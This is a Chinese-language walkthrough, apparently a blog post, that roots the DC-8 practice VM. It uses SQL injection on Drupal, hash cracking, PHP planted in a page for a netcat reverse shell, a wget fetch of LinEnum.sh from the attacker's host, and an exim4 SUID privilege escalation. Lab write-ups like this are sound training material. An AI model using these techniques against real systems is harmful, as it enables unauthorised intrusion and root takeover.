靶机闯关 DC-8

2020-07-27 15:46:39 浏览数 (1)

靶机下载:

http://www.five86.com/dc-8.html

环境搭建: 导入虚拟机设置NAT。靶机DHCP已启用

开始渗透:

使用netdiscover二层扫描工具获取靶机IP为192.168.111.137后

使用nmap对靶机网络服务端口进行探测

代码语言:javascript复制
nmap -A -p- 192.168.111.137

扫描发现开放了22和80端口,分别对应的服务是ssh和http,值得注意的是还发现了robots.txt,访问之

发现里面是Drupal 的一些安装文件,而且或获知的Drupal的版本

先目录扫描一波看看有没有一些敏感目录,发现user是一个管理登陆页面

代码语言:javascript复制
gobuster dir -u http://192.168.111.137 -w /usr/share/wordlists/dirb/big.txt

访问80端口,测试了一些页面发现侧边选项栏的URL可能存在SQL注入

测试一些顺利爆出数据库,可惜的是权限不够高

接下来进一步获取,最后爆出两个管理员账号和密码,但是不是MD5加密,百度了一下应该是哈希加密

把两个hash密码保存到两个文件,使用john爆破

此时已经知道了登陆页面,使用管理账号密码登陆进去,发现有页面编辑

本来想着使用中国蚁剑连接shell的,但是连接下使用有点不顺畅,就使用netcat反弹一个shell

php代码修改到了Contact Us页面上,而且测试了一些要运行PHP代码是提交数据才行

使用python获取一个完全交互的shell,并且在本地传输一个linux辅助提权脚本

代码语言:javascript复制
目标shell:python -c "import pty;pty.spawn('/bin/bash')"
wget http://192.168.111.128:8888/LinEnum.sh
代码语言:javascript复制
kali:python -m SimpleHTTPServer 8888

赋予权限后执行,发现exim4在使用时具有root权限,那这可能是一个突破口

(SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。)

查阅版本,并且在kali上搜索关于版本的漏洞

代码语言:javascript复制
searchsploit exim

现在看下脚本的利用方式,里面介绍了有两个使用方式,并且使用vim把shell的文件格式修改成unix

(如果脚本文件的格式不是unix的话,在linux上执行会报错,具体查阅https://blog.csdn.net/chenzhou123520/article/details/84410305)

修改之后把脚本文件下载到目标机器,给与执行权限使用第一种方式参数 setuid进行提权

但是提权失败了,这个时候使用第二种参数提权

可以看到已经获取到权限了,一般最后的flag都是在root里面,进入到root即可获取flag

最后收一下尾

0 人点赞